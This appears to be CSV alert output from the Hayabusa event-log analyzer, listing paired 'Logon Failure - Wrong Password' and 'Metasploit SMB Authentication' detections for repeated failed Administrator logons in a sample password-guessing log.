SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: 
